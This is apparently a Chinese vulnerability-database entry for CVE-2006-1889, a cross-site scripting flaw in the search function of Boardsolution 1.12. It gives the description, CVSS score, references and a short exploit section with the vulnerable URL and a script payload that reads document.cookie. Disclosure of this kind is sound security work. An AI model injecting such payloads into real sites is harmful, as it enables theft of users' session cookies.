Boardsolution index.php 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195290 漏洞类型 跨站脚本
发布时间 2006-04-20 更新时间 2006-04-21
CVE编号 CVE-2006-1889 CNNVD-ID CNNVD-200604-363
漏洞平台 N/A CVSS评分 5.8
|漏洞来源
https://cxsecurity.com/issue/WLB-2006040089
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-363
|漏洞详情
NilsAsmussen(即SCRIPTSOLUTION)Boardsolution1.12及早期版本中的index.php中的搜索动作处理器存在跨站脚本攻击漏洞。这使得远程攻击者可以借助于"Searchfor"项(关键字参数)注入任意Web脚本或HTML。
|漏洞EXP
Boardsolution <= 1.12 XSS

http://www.[SITE].com/[PATH]/index.php?action=search

Search for:-
'><script>alert(document.cookie)</script>

Found By:
Qex
|参考资料

来源:BID
名称:17549
链接:http://www.securityfocus.com/bid/17549
来源:BUGTRAQ
名称:20060415Boardsolution<=1.12XSS
链接:http://www.securityfocus.com/archive/1/archive/1/431072/100/0/threaded
来源:XF
名称:boardsolution-index-xss(25805)
链接:http://xforce.iss.net/xforce/xfdb/25805
来源:VUPEN
名称:ADV-2006-1413
链接:http://www.frsirt.com/english/advisories/2006/1413
来源:SECTRACK
名称:1015948
链接:http://securitytracker.com/id?1015948
来源:SREASON
名称:766
链接:http://securityreason.com/securityalert/766
来源:SREASON
名称:718
链接:http://securityreason.com/securityalert/718
来源:SECUNIA
名称:19654
链接:http://secunia.com/advisories/19654